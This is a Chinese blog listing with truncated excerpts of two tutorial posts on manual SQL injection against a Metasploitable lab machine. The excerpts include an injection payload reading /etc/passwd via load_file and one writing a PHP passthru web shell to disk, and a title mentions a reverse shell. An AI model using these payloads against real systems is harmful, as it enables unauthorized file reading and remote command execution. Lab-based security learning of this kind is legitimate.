2016年10月26日

小白日记41:kali渗透测试之Web渗透-SQL手工注入(三)-猜测列名、表名、库名、字段内容,数据库写入

摘要: SQL手工注入 靶机:metasploitable(低) 1、当无权读取infomation_schema库【MySQL最重要的源数据库,必须有root权限】/拒绝union、order by语句 #若不为root a.猜列名: ' and coclumn is null--+ 【并且列有一个字段为 阅读全文

posted @ 2016-10-26 20:27 子轩非鱼 阅读(1727) 评论(0) 推荐(0) 编辑

小白日记40:kali渗透测试之Web渗透-SQL手工注入(二)-读取文件、写入文件、反弹shell

摘要: SQL手工注入 1、读取文件【load_file函数】 ' union SELECT null,load_file('/etc/passwd')--+ burpsuite 2、写入文件 ' union select null,"<?php passthru($_GET['cmd']); ?>" IN 阅读全文

posted @ 2016-10-26 01:16 子轩非鱼 阅读(2334) 评论(0) 推荐(0) 编辑

导航